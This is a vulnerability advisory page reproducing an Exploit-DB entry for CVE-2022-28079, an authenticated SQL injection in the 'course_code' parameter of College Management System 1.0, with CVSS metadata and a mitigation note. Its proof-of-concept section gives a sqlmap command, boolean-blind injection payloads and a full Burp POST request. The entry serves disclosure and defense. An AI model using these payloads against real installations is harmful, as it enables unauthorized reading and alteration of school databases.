College Management System - 'course_code' SQL Injection (Authenticated)

vendor:

College Management System

by:

Eren Gozaydin

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: College Management System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: CVE-2022-28079

CPE: a:code-projects:college_management_system:1.0

Metasploit:

Other Scripts:

Tags: cve,cve2022,sqli,cms,collegemanagement

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated, https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f, https://nvd.nist.gov/vuln/detail/CVE-2022-28079, https://code-projects.org/college-management-system-in-php-with-source-code/, https://www.nu11secur1ty.com/2022/05/cve-2022-28079.html

Nuclei Metadata: {'max-request': 1, 'verified': True, 'vendor': 'college_management_system_project', 'product': 'college_management_system'}

Platforms Tested: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51

2022

College Management System – ‘course_code’ SQL Injection (Authenticated)

College Management System 1.0 allows SQL Injection via parameter 'course_code' in /College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Implement input validation and parameterized queries to prevent SQL Injection attacks. Regularly update and patch the application to address any known vulnerabilities.

Source

Exploit-DB raw data:

# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated)
# Date: 2022-24-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/
# Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-28079
# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079

------------------------------------------------------------------------------------

1. Description:
----------------------

College Management System 1.0 allows SQL Injection via parameter 'course_code' in
/College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.


2. Proof of Concept:
----------------------

In Burpsuite intercept the request from the affected page with
'course_code' parameter and save it like poc.txt Then run SQLmap to extract the
data from the database:

sqlmap -r poc.txt --dbms=mysql


3. Example payload:
----------------------

boolean-based blind
Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ


4. Burpsuite request:
----------------------

POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe
Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns